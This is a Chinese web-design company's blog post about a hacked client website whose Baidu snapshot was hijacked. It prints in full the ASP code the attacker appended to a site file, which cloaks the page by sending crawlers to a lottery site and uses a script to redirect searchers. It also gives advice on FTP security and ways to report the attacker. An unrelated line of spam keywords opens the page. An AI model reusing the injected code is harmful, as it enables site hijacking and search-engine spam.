日日麻批免费40分钟日本的_99久久伊人一区二区yy5o99_嗯啊~流水噗呲h啪啪hhh双性_uc浏览器下载安装2022最新版

西安網站建設 | 西安網站制作 | 西安網站設計 | 西安小程序開發 | 兄弟網絡 - 西安網站建設十余年經驗,值得信賴!
了解市場新觀點,內部案例剖析,增強服務意識與專業水平。

百度快照是如何被黑客篡改的

來源:西安網站制作   日期:2015-06-09 16:07:32   點擊:4512

寫本篇文章的目的在于揭露一種黑客作弊的手段,也給那些疏于企業網站安全的站長提一個醒。同時提供一種追找黑客行蹤的簡單方法。

百度快照 網站安全 搜索引擎排名

前幾日,我的客戶電話說自己的百度排名沒有了,查詢下竟然百度標簽顯示的內容是一家彩票平臺的網站內容。 我知道網站被黑客加入了非法代碼,惡意篡改了百度快照。(截圖如下)

百度快照 網站安全 搜索引擎排名

查看“百度快照”出現的是一組跳轉網站的廣告內容。我們對客戶設置的網站信息消失了。

百度快照 網站安全 搜索引擎排名

1、黑客是如何修改百度快照的呢?

我進行了排查,客戶的網站是使用asp源碼開發的。發現有個文件被黑客寫入了一段代碼。

路徑:Inc文件夾—SysProduct.asp文件里面最底下添加了如下代碼:

百度快照 網站安全 搜索引擎排名

<%

function Getbot()

dim s_agent

GetBot=""

s_agent=Request.ServerVariables("HTTP_USER_AGENT")

if instr(1,s_agent,"googlebot",1) > 0 then

GetBot="google"

end if

if instr(1,s_agent,"baiduspider",1) > 0 then

GetBot="baidu"

end if

end function

if GetBot="baidu" or GetBot="google" then

'

Response.Redirect "http://*********"(跳轉的網站,引導百度抓取的內容)

else

'

Response.Write"<script type=""text/javascript"">var d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http://*********';(目標網站)window.adworkergo='ad_app6'}else{}</script>"

end if

%>

黑客設置的這串代碼導致百度爬蟲抓取網頁的時候,直接抓取越過客戶網站抓取了跳轉網站內容,導致百度快照里面顯示的是別的內容。使得客戶本來排名首頁的網站直接被百度屏蔽了。造成了客戶很大的損失。

2、那么黑客是如何進入后臺的呢?

黑客要進入后臺,必須知道FTP賬戶和密碼,以及IP地址。

造成的原因有如下幾種:

1)一方面是FTP密碼設置的時候比較簡單化,很容易被利用軟件破解掉,

2)另一方面選擇便宜的空間也是一種隱患。因為空間IP以及用戶名是很難被知道的,除非有人提供。

3、網站被黑之后,你如何追查黑客的來源?

方法比較簡單,就是查詢你跳轉的目標網站的域名信息。一般情況下,都是一些小型的站長開發的賺錢網站,通過查詢域名信息你可以獲知該域名的歸屬人是誰,他有可能就是黑你網站的人。

如果是比較大型的網站利用外包的方式進行推廣,那么你也可以得知負責人,給百度或者是網絡警察舉報一下,該網站存在惡意攻擊修改內容的行為,畢竟它也有一定得責任。

通過中國萬網Whois域名查詢:比如我客戶跳轉的彩票網站的域名信息如下:

百度快照 網站安全 搜索引擎排名

1)第一個是:注冊人

2)第二個是:聯系電話

3)第三個是:聯系郵箱

基本上你聯系注冊人就可以解決問題。如果對你客戶造成的損失太大的話,建議你通過以下方式進行維權:

違法和不良信息舉報中心:http://net.china.cn/

12321網絡不良與垃圾信息舉報受理中心:http://www.12321.cn/

國家互聯網應急中心網絡安全舉報中心:http://www.cert.org.cn/

中國反釣魚網站聯盟認定及處理流程: http://www.cnnic.cn/

公安部信息網絡安全報警網站:http://www.cyberpolice.cn/wfjb/

中國掃黃打非網:http://www.shdf.gov.cn/

北京市公安局網絡違法犯罪舉報網站:http://www.bj.cyberpolice.cn/index.jsp

希望本篇文章對你防黑有幫助。

注:相關網站建設技巧閱讀請移步到建站教程頻道。

上一篇:站長自述:如何降低域名被惡意泛解析風險?     下一篇:中國網站安全防黑聯盟成員已近200家
掃碼立即溝通
公眾號加關注
版權所有:西安兄弟信息科技有限公司 陜ICP備07012704號-8   地址:西安市三橋街道恒大都市廣場(1號線灃東自貿園站C1口)  營業執照    網站地圖  
關閉
029-86512630 工作:8:30-17:30

*